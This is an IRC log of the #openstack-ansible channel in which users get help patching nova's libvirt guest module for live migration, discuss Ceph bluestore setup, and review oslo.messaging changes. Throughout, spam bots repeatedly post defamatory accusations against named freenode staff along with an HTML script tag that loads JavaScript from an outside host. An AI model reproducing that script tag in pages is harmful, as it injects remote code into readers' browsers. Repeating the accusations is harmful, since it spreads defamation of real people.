Thursday, 2018-07-26

openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-ops master: Further tune the playbooks, configs, and thread pool  https://review.openstack.org/58556700:22
*** hamzy has joined #openstack-ansible00:38
*** tux_ has joined #openstack-ansible00:41
tux_coolj: sorry i was away, making dinner00:50
tux_coolj: are you there now?00:50
tux_tag me if you are there...00:51
cooljtux_: I replied to your stack exchange question. it looks like a method wasn't backported to the pike libvirt guest module so you will have to modify code to avoid the error or wait for an upstream patch and then wait for osa to consume it unfortunately. i also updated the nova bug with the same info.00:52
tux_where i should edit and which file ?00:53
tux_I am confused00:53
tux_In this link there are three file which one i should edit ? https://github.com/openstack/nova/commit/23446a9552b5be3b040278646149a0f481d0a00500:55
coolj/openstack/venvs/nova-16.0.16/lib/python2.7/site-packages/nova/virt/libvirt/guest.py on all the compute hosts (or maybe there's a way to modify it and then have osa build a new venv with the modified file, i'm not sure about that... cloudnull might be able to help with that)00:55
tux_Do you think if i upgrade to queens it will fix issue?00:56
tux_I have this file /openstack/venvs/nova-16.0.16/lib/python2.7/site-packages/nova/virt/libvirt/guest.py   should you think i can add it here and try to do migration ?00:57
cooljthe queens version of the guest module has that method backported already, so i would think it would not have the same error00:57
cooljhttps://github.com/openstack/nova/blob/stable/queens/nova/virt/libvirt/guest.py#L68600:57
*** mmercer has quit IRC00:57
cooljyes, i believe so00:58
tux_coolj: Hold on let me do it now and see...00:58
cooljtry it with a new instance as well in case other things are broken from hitting that error originally00:58
tux_yup00:59
tux_I am add this stanza in guest.py http://paste.openstack.org/show/726663/01:00
tux_is that enough?01:00
tux_coolj: ^^01:00
cooljyeah that should work, i just wasn't sure if migrateSetMaxSpeed is implemented which is why i just put "pass" on stack exchange, but try adding that paste and see01:02
cooljadd it before the migrate_start_postcopy method and make sure it's indented to the same level01:02
coolj(so it looks like in that github diff)01:03
*** linuxdaemon28 has joined #openstack-ansible01:03
linuxdaemon28Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/01:03
linuxdaemon28or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/01:03
linuxdaemon28Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate01:03
linuxdaemon28<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>01:03
linuxdaemon28This message was brought to you by Private Internet Access01:03
*** linuxdaemon28 has quit IRC01:04
tux_coolj:  OMG!!!!!!!!!!!!!!!!01:06
tux_You are just awesome! man....01:06
tux_it works :)01:06
cooljsweet! :D01:06
tux_no error no complain everything works smoothly01:06
tux_Damn!!! it01:06
tux_i feel like i kill my whole day behind this....01:06
cooljunfortunately you have to copy that file to all the other compute nodes or else find out how to make osa build a new nova-compute venv with the patched file01:07
tux_where have you been whole day ?????01:07
cooljlol i know that feeling01:07
tux_I am planning to upgrade PIKE to QUEENS01:07
tux_do you think that would be good idea... i hate hacks01:07
*** gyee has quit IRC01:08
coolji have never upgraded from pike, we are still on newton at work, so i'm not sure about how easy/hard that is. but if you can get to queens i don't see a reason not to do it01:08
*** C0c0dril022 has joined #openstack-ansible01:08
C0c0dril022Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/01:09
*** C0c0dril022 has quit IRC01:09
tux_my cluster still not in production so i think i have option to move to Queen01:09
tux_coolj: let me test both direction to make sure all good01:12
cooljtux_: sure, just patch the other compute the same way01:13
tux_I did both node01:13
tux_C1-----C2  was quick  but C2---->C1  in still stuck Migrating state01:14
tux_16    instance-00000059              paused01:14
tux_it in paused state01:14
tux_finally DONE01:15
tux_why it took long time ?01:15
tux_i will dig and see what i can find01:15
cooljnot sure, maybe something on the ceph side?01:16
tux_coolj: Thank you man!! i really really appreciate whatever you did :)01:16
cooljsure thing, glad to help! :)01:17
tux_coolj: I have one more question related Ceph if you don't mind01:18
coolji'm not super knowledgable about cheph but sure01:19
tux_I don't believe you.. that you are not knowledgable...lol01:20
tux_I have this configuration for my Ceph http://paste.openstack.org/show/726664/01:20
tux_I have all SSD in my OSD nodes01:20
tux_I am using bluestore so i want to keep journal + Data on same SSD01:21
cooljsure01:21
tux_when I am trying to use  "osd_scenario: lvm"  its throwing error that you don't have LVM configured01:22
tux_How do i create LVM on my single SSD so both journal + data stay on same disk?01:22
tux_Do i need to create two partition in vg (volume group) and create logical volume  LV-1 and LV-2  one for journal and one for data?01:23
coolji believe you want the collocated scenario and also set "journal_collocation: true" and it will keep the journal on the same drive as the osd01:23
tux_But i heard bluestore should use on LVM01:24
tux_is that true?01:24
cooljoh that might be an old setting, checking01:24
tux_http://docs.ceph.com/ceph-ansible/master/osds/scenarios.html01:25
tux_Check bottom section01:25
cooljah yeah that was an old setting before the new scenario https://github.com/ceph/ceph-ansible/issues/1752#issuecomment-32313260901:25
-tux_- osd_objectstore: bluestore01:26
-tux_- osd_scenario: lvm01:26
-tux_- lvm_volumes:01:26
-tux_- - data: data-lv101:26
-tux_- data_vg: vg101:26
tux_you are saying i shouldn't use LVM with bluestore?01:26
*** gregoryo has joined #openstack-ansible01:27
cooljyeah, sorry i'm not really familiar with that. i'm not sure the best practice. let me see if see if our storage guy is around and i will ask him01:27
tux_coolj: thanks man01:28
tux_I am using OSA 16.0.15 which is using ceph-ansible v3.0.8  (This roles doesn't support lvm auto create, so people saying you should use ceph-ansible v3.1.x to get lvm support)01:29
tux_I am using OSAD with Ceph-ansible so in that case i have to upgrade to queen to get that support :) because queens using ceph-ansible v3.1.x01:30
cooljah i see. my guy is not responding to ping on slack, he's probably not going to see it until tomorrow.01:33
*** Humbedooh79 has joined #openstack-ansible01:33
Humbedooh79Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/01:33
Humbedooh79or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/01:33
Humbedooh79Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate01:33
Humbedooh79<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>01:33
Humbedooh79This message was brought to you by Private Internet Access01:33
*** Humbedooh79 has quit IRC01:33
tux_coolj: don't worry we can talk about this tomorrow I am fine :)01:35
tux_coolj: let me know what your storage guy suggesting01:35
cooljcool, i will let you know01:36
tux_coolj: every stupid question... what is new in QUEEN which is not available in PIKE?  most of time i have notice all openstack version looks same :)01:43
*** markvoelker has joined #openstack-ansible01:43
tux_in should after upgrade to QUEENS what i should expect ?01:43
*** markvoelker_ has quit IRC01:44
tux_are there something new in QUEENS which is not in PIKE?01:44
*** markvoelker_ has joined #openstack-ansible01:46
cooljusually lots of bug fixes, but you would have to check the release notes for each project. here is nova https://docs.openstack.org/releasenotes/nova/queens.html01:46
*** markvoelker has quit IRC01:48
*** stoner193 has joined #openstack-ansible01:48
stoner193Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/01:48
*** stoner193 has quit IRC01:48
tux_coolj: thanks reading..01:50
*** ckeltz25 has joined #openstack-ansible01:58
ckeltz25Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/01:58
*** ckeltz25 has quit IRC01:58
*** JohnnyLee has joined #openstack-ansible02:06
*** JohnnyLee has quit IRC02:10
*** armaan has quit IRC02:13
*** nkk7119 has joined #openstack-ansible02:24
nkk7119Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/02:24
nkk7119or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/02:24
nkk7119Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate02:24
nkk7119<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>02:24
nkk7119This message was brought to you by Private Internet Access02:24
*** nkk7119 has quit IRC02:24
*** gregoryo has quit IRC02:25
*** speedmann has joined #openstack-ansible02:43
*** speedmann has quit IRC02:43
*** speedmann has joined #openstack-ansible02:44
*** openstack has joined #openstack-ansible02:50
*** ChanServ sets mode: +o openstack02:50
*** dave-mcc_ has quit IRC03:02
*** jwitko has quit IRC03:10
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-os_keystone master: Add systemd journal logging to the service config  https://review.openstack.org/58552403:17
*** harryhuang_ has joined #openstack-ansible03:27
*** tux_ has quit IRC03:34
*** udesale has joined #openstack-ansible03:48
*** gkadam has joined #openstack-ansible03:49
*** danzilio2617 has joined #openstack-ansible03:53
danzilio2617Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/03:53
danzilio2617or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/03:53
danzilio2617Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate03:53
danzilio2617<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>03:53
danzilio2617This message was brought to you by Private Internet Access03:53
*** danzilio2617 has quit IRC03:53
*** tux_ has joined #openstack-ansible03:59
*** tux_ has quit IRC04:01
*** poopcat has quit IRC04:02
*** pelegreno______2 has joined #openstack-ansible04:13
pelegreno______2Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/04:13
pelegreno______2or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/04:13
pelegreno______2Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate04:13
pelegreno______2<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>04:13
pelegreno______2This message was brought to you by Private Internet Access04:13
*** pelegreno______2 has quit IRC04:13
openstackgerritMerged openstack/openstack-ansible-ops master: Allow mounting of shared filesystems for index backup/restore  https://review.openstack.org/58578904:15
*** Grimnir23 has joined #openstack-ansible04:23
*** yawkat27 has joined #openstack-ansible04:23
Grimnir23Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/04:23
*** Grimnir23 has quit IRC04:23
yawkat27Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/04:23
yawkat27or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/04:23
yawkat27Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate04:23
yawkat27<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>04:23
yawkat27This message was brought to you by Private Internet Access04:23
*** yawkat27 has quit IRC04:23
*** kameloso2 has joined #openstack-ansible04:38
kameloso2Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/04:38
*** kameloso2 has quit IRC04:38
*** Rhvs_ has quit IRC04:38
*** Rhvs has joined #openstack-ansible04:40
*** ChasedSpade2513 has joined #openstack-ansible04:44
ChasedSpade2513Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/04:44
*** ChasedSpade2513 has quit IRC04:44
*** spsurya_ has quit IRC04:48
*** spsurya_ has joined #openstack-ansible04:49
openstackgerritKevin Carter (cloudnull) proposed openstack/openstack-ansible-os_keystone master: Add systemd journal logging to the service config  https://review.openstack.org/58552404:52
*** armaan has joined #openstack-ansible04:57
*** armaan has quit IRC05:01
*** shyamb has joined #openstack-ansible05:04
*** shyamb has quit IRC05:04
*** nyloc has quit IRC05:06
*** Tahvok has quit IRC05:06
*** spsurya_ is now known as spsurya05:07
*** Rhvs has quit IRC05:08
*** nyloc has joined #openstack-ansible05:09
*** Tahvok has joined #openstack-ansible05:10
*** Rhvs has joined #openstack-ansible05:11
*** gkadam has quit IRC05:39
*** Nightmare26 has joined #openstack-ansible05:43
Nightmare26Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/05:43
Nightmare26or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/05:43
Nightmare26Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate05:43
Nightmare26<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>05:43
Nightmare26This message was brought to you by Private Internet Access05:43
*** Nightmare26 has quit IRC05:43
*** madorn has quit IRC05:59
*** madorn has joined #openstack-ansible06:01
*** tux_ has joined #openstack-ansible06:02
*** udesale has quit IRC06:04
*** udesale has joined #openstack-ansible06:04
*** tux_ has quit IRC06:06
*** wsm has joined #openstack-ansible06:08
wsmHey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/06:08
wsmor maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/06:08
wsmRead what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate06:08
wsm<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>06:08
wsmThis message was brought to you by Private Internet Access06:08
*** wsm has quit IRC06:08
*** cshen has joined #openstack-ansible06:24
*** hachi has joined #openstack-ansible06:30
*** shyamb has joined #openstack-ansible06:35
*** speedmann has quit IRC06:39
*** exodusftw has quit IRC06:42
*** exodusftw has joined #openstack-ansible06:42
*** vnogin has joined #openstack-ansible06:43
evrardjpOMG spam won't stop06:47
*** vnogin has quit IRC06:49
*** speedmann has joined #openstack-ansible06:56
*** gkadam has joined #openstack-ansible07:04
*** shyamb has quit IRC07:09
odyssey4meYeah, I'll bet the freenode admins are freaking out a bit.07:12
odyssey4meo/07:12
odyssey4mecores, please could I get some eyes on these backports: https://review.openstack.org/#/q/I38002a18dff4dbd44bd3df9e1969c9d50ab1270507:24
odyssey4mealso this little bit of tidying up https://review.openstack.org/58324107:25
*** pcaruana has joined #openstack-ansible07:25
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_swift master: Move MQ vhost/user creation into role  https://review.openstack.org/58339307:28
odyssey4meand this missing mq password in the tests repo: https://review.openstack.org/58463007:29
*** kberger has joined #openstack-ansible07:35
*** tosky has joined #openstack-ansible07:38
*** KeithMnemonic has quit IRC07:38
openstackgerritJean-Philippe Evrard proposed openstack/openstack-ansible-os_barbican master: Update to use oslo.messaging service for RPCand Notify  https://review.openstack.org/57486407:58
*** shyamb has joined #openstack-ansible08:01
*** shardy has joined #openstack-ansible08:10
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_glance master: Default MQ RPC/Notify credentials/vhosts to match  https://review.openstack.org/58599008:13
*** Lausefuchs19 has joined #openstack-ansible08:13
Lausefuchs19Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/08:13
Lausefuchs19or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/08:13
*** Lausefuchs19 has quit IRC08:13
*** suggestable has joined #openstack-ansible08:14
*** Bhujay has joined #openstack-ansible08:14
*** okdas has joined #openstack-ansible08:14
okdasHey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/08:14
*** okdas has quit IRC08:14
odyssey4meevrardjp: something like https://review.openstack.org/585990 better?08:14
*** shyamb has quit IRC08:14
odyssey4meshould I also work in the filtering to ensure that the value put into the template is consistent?08:14
*** shyamb has joined #openstack-ansible08:14
*** shyamb has quit IRC08:19
*** armaan has joined #openstack-ansible08:19
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_glance master: Default MQ RPC/Notify credentials/vhosts to match  https://review.openstack.org/58599008:22
odyssey4meevrardjp: ^ added the other bit08:22
odyssey4meaio_meta_ for suse seems to be failing quite often during tempest tests :/08:24
evrardjpwell it's all of them08:27
evrardjpodyssey4me: commented08:31
odyssey4meevrardjp: replied08:33
evrardjpodyssey4me: I think I was not understood08:36
evrardjpyou're saying the oslo_messaging_rabbit doesn't apply to both oslo_messaging backends?08:36
*** Bhujay has quit IRC08:37
*** Bhujay has joined #openstack-ansible08:37
evrardjpodyssey4me: I'd rather rely on _rpc_use_ssl than notify_use_ssl08:37
evrardjpfor determining if ssl must be used08:38
odyssey4meevrardjp: it does get used for both, but only when rabbit is the backend08:38
evrardjpofc08:38
evrardjpso08:38
evrardjpif the notifications can be sent to qpid08:38
evrardjpiirc08:39
odyssey4meso when we switch qrouterd to be used for RPC, and qrouterd is set to not use SSL, then the SSL for notifications, if set, won't work08:39
odyssey4meas far as I know, notifications won't go to qrouterd08:39
odyssey4mebut meh, I'll leave it if that's a contention08:39
odyssey4meI'd rather they fix the bug upstream, honestly08:40
odyssey4me(to make the transport thing work)08:40
evrardjpoh I thought it was the other way around08:40
evrardjpqdrouterd is not for notifications but for rpc?08:41
evrardjpthat explains it08:41
odyssey4menotifications is for ceilometer08:41
odyssey4merpc is really the only thing we use by default08:41
evrardjpofc08:41
evrardjpyeah08:41
noonedeadpunkodyssey4me evrardjp could you please help with https://review.openstack.org/#/c/584629/ when you'll have time to spare?08:41
evrardjpbut08:41
evrardjpamqp is for rpc or notifications?08:41
odyssey4menoonedeadpunk: I'll take a look at it this evening, after my work day.08:41
odyssey4meevrardjp: the new implementation is for rpc only08:41
noonedeadpunkodyssey4me: thanks. I think the point is in the pip options, but I can hardly imagine where exactly08:42
evrardjpodyssey4me: that's where I thought it was the opposite08:42
odyssey4meqrouterd for rpc (it doesn't need durability), rabbit for notifications (it has durable, highly available queues)08:42
evrardjpk08:43
*** raSter^16 has joined #openstack-ansible08:43
*** justJanne16 has joined #openstack-ansible08:43
raSter^16Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/08:43
evrardjpso that makes sense then08:43
raSter^16or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/08:43
justJanne16Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/08:43
justJanne16or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/08:43
raSter^16Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate08:43
raSter^16<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>08:43
justJanne16Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate08:43
evrardjpodyssey4me: maybe write this down in the commit message?08:43
raSter^16This message was brought to you by Private Internet Access08:43
justJanne16<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>08:43
justJanne16This message was brought to you by Private Internet Access08:43
evrardjpoh it's written08:43
evrardjpI have missed the last sentence08:43
*** raSter^16 has quit IRC08:43
evrardjpmy bad08:44
*** justJanne16 has quit IRC08:44
openstackgerritJean-Philippe Evrard proposed openstack/openstack-ansible-os_glance master: Default MQ RPC/Notify credentials/vhosts to match  https://review.openstack.org/58599008:44
*** udesale_ has joined #openstack-ansible08:44
evrardjpsorry for the interruption then08:44
odyssey4meok, once that merges later today I'll script that update across all the roles08:45
odyssey4meI can edit them into ansmith's outstanding patches now though. I don't think he'll mind.08:46
*** udesale has quit IRC08:46
odyssey4meor, perhaps better, I'll ensure they're in my patches which go on top of his08:47
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_barbican master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/57486408:49
evrardjpodyssey4me: very interesting it seems that the latest aio_metal on suse had an import issue of libvirt08:51
evrardjpin its logs08:51
odyssey4meorly?08:51
evrardjpI am not sure about the impact08:52
evrardjpwill check the rest08:52
evrardjpof the logs08:52
evrardjpand then will try to see on ubuntu08:52
evrardjpbut that might be the reason of slowdowns08:52
evrardjpcrapton issues in neutron-server.log as usual. Will try to bump neutron after m3 to see if it fixes it too08:55
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552608:57
evrardjpand great: glance_store._drivers.swift.utils [-] (u'swift config file %(conf)s:%(exc)s not found', {'exc': TypeError("'NoneType' object is not iterable",), 'conf': '/etc/glance/glance-swift-store.conf'})08:57
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552608:58
evrardjphow the hell has this passed tempest testing in the past?08:58
evrardjpI seriously have a lack of faith in tempest now08:58
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552608:59
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552608:59
evrardjpodyssey4me: ok it seems for neutron errors, there is something that could come from the migration of DB into roles:09:01
evrardjpneutron.service OperationalError: (pymysql.err.OperationalError) (1045, u"Access denied for user 'neutron'@'aio1.openstack.local' (using password: YES)")09:02
odyssey4mehmm, maybe a coflicting password somewhere?09:02
odyssey4me*conflicting09:02
evrardjphttps://github.com/openstack/openstack-ansible-os_neutron/blob/master/tasks/neutron_db_setup.yml#L3909:02
evrardjpisn't % supposed to be good?09:02
odyssey4meyes09:02
*** tux_ has joined #openstack-ansible09:03
odyssey4memaybe it needs privs append?09:03
evrardjpor we need to explicitly list?09:03
evrardjphaha yeah09:03
evrardjpwondering09:03
evrardjplet me spin up a new aio for that then09:04
evrardjpI think nova issue might be due to my changes09:04
evrardjpI will check09:04
odyssey4melooks like append_privs was only there is it was given that option: https://github.com/openstack/openstack-ansible/blob/master/playbooks/common-tasks/mysql-db-user.yml#L3809:05
odyssey4meand it wasn't: https://github.com/openstack/openstack-ansible/commit/b44b828526533f12ee0ea5d12bbf98ee07403d57#diff-0f68f25e9a9fcb0debd0533f06042b5e09:05
evrardjpok, so because have a list we should auto append?09:06
*** tux_ has quit IRC09:07
evrardjpodyssey4me: but that's just for privs, it shouldn't be hurting does it?09:08
*** pmannidi has quit IRC09:08
*** shyamb has joined #openstack-ansible09:08
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_tacker master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58570909:08
evrardjpwait a minute09:08
*** shyamb has quit IRC09:10
odyssey4meevrardjp: no, I mean that it's doing the same as it did before09:10
evrardjpk09:10
*** shyamb has joined #openstack-ansible09:10
odyssey4meperhaps what we did before wasn't so good either :p09:11
evrardjpno I think it looks fine09:11
evrardjpbut there is something else going on09:11
evrardjpa deploy will help me figure it out09:11
evrardjpit's deploying right now09:11
evrardjpI hope I will fix these configuration issues, so that we can have faster builds09:12
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_watcher master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58573609:14
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_watcher master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58573609:16
*** armaan has quit IRC09:22
*** armaan has joined #openstack-ansible09:23
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: Switch compute to use different inventory_hostname  https://review.openstack.org/58602509:26
*** Bhujay has quit IRC09:30
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58577309:30
*** Bhujay has joined #openstack-ansible09:30
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58577309:31
*** A_D6 has joined #openstack-ansible09:33
A_D6Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/09:33
A_D6or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/09:33
*** alphaseg25 has joined #openstack-ansible09:33
alphaseg25Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/09:33
alphaseg25or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/09:33
A_D6Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate09:33
A_D6<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>09:33
alphaseg25Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate09:33
alphaseg25<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>09:33
A_D6This message was brought to you by Private Internet Access09:33
alphaseg25This message was brought to you by Private Internet Access09:33
*** A_D6 has quit IRC09:33
*** alphaseg25 has quit IRC09:33
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_barbican master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/57486409:36
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_barbican master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/57486409:37
openstackgerritMerged openstack/openstack-ansible-os_zun master: Remove the unnecessary space  https://review.openstack.org/58276609:39
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_congress master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58582509:40
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_swift master: Move MQ vhost/user creation into role  https://review.openstack.org/58339309:43
*** shyamb has quit IRC09:44
*** shyamb has joined #openstack-ansible09:44
*** Bhujay has quit IRC09:48
*** Bhujay has joined #openstack-ansible09:48
*** armaan has quit IRC09:50
*** armaan has joined #openstack-ansible09:51
*** Bhujay has quit IRC09:51
*** Bhujay has joined #openstack-ansible09:52
*** lukaslemes has joined #openstack-ansible09:54
*** Bhujay has quit IRC09:54
*** Bhujay has joined #openstack-ansible09:55
*** Bhujay has quit IRC09:57
*** Bhujay has joined #openstack-ansible09:58
jrossercloudnull: http://paste.openstack.org/show/726674/10:00
*** armaan has quit IRC10:01
*** armaan has joined #openstack-ansible10:02
*** flaviosr has joined #openstack-ansible10:06
*** udesale__ has joined #openstack-ansible10:08
*** udesale_ has quit IRC10:10
*** shyamb has quit IRC10:14
*** shyamb has joined #openstack-ansible10:14
*** DKFermi has joined #openstack-ansible10:15
*** DKFermi has left #openstack-ansible10:16
*** Bhujay has quit IRC10:22
*** Bhujay has joined #openstack-ansible10:23
*** frmus21 has joined #openstack-ansible10:23
frmus21Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/10:23
frmus21or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/10:23
frmus21Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate10:23
frmus21<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>10:23
frmus21This message was brought to you by Private Internet Access10:23
*** arahael24 has joined #openstack-ansible10:23
arahael24Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/10:23
arahael24or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/10:23
arahael24Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate10:23
arahael24<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>10:23
arahael24This message was brought to you by Private Internet Access10:23
*** arahael24 has quit IRC10:23
*** frmus21 has quit IRC10:23
*** shyamb has quit IRC10:25
openstackgerritMerged openstack/ansible-config_template master: Fix usage of "|" for tests  https://review.openstack.org/58223810:30
*** thevdude3 has joined #openstack-ansible10:33
thevdude3Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/10:33
thevdude3or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/10:33
*** thevdude3 has quit IRC10:33
*** hakonw has joined #openstack-ansible10:39
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_zun master: Include common test vars  https://review.openstack.org/58604510:41
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552610:42
openstackgerritJesse Pretorius (odyssey4me) proposed openstack/openstack-ansible-os_masakari master: Update to use oslo.messaging service for RPC and Notify  https://review.openstack.org/58552610:42
*** armaan has quit IRC10:50
*** armaan has joined #openstack-ansible10:50
*** Bhujay has quit IRC10:56
*** Bhujay has joined #openstack-ansible10:57
*** Bhujay has quit IRC10:57
*** Bhujay has joined #openstack-ansible10:58
*** Bhujay has quit IRC10:59
*** Bhujay has joined #openstack-ansible10:59
*** tux_ has joined #openstack-ansible11:03
*** ynyounuo12 has joined #openstack-ansible11:08
ynyounuo12Hey, I thought you guys might be interested in this blog by freenode staff member Bryan 'kloeri' Ostergaard https://bryanostergaard.com/11:08
ynyounuo12or maybe this blog by freenode staff member Matthew 'mst' Trout https://MattSTrout.com/11:08
ynyounuo12Read what IRC investigative journalists have uncovered on the freenode pedophilia scandal https://encyclopediadramatica.rs/Freenodegate11:08
ynyounuo12<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>11:08
*** tux_ has quit IRC11:08
ynyounuo12This message was brought to you by Private Internet Access11:08
*** ynyounuo12 has quit IRC11:08
*** shyamb has joined #openstack-ansible11:09
*** ansmith has quit IRC11:10
*** dave-mccowan has joined #openstack-ansible11:10
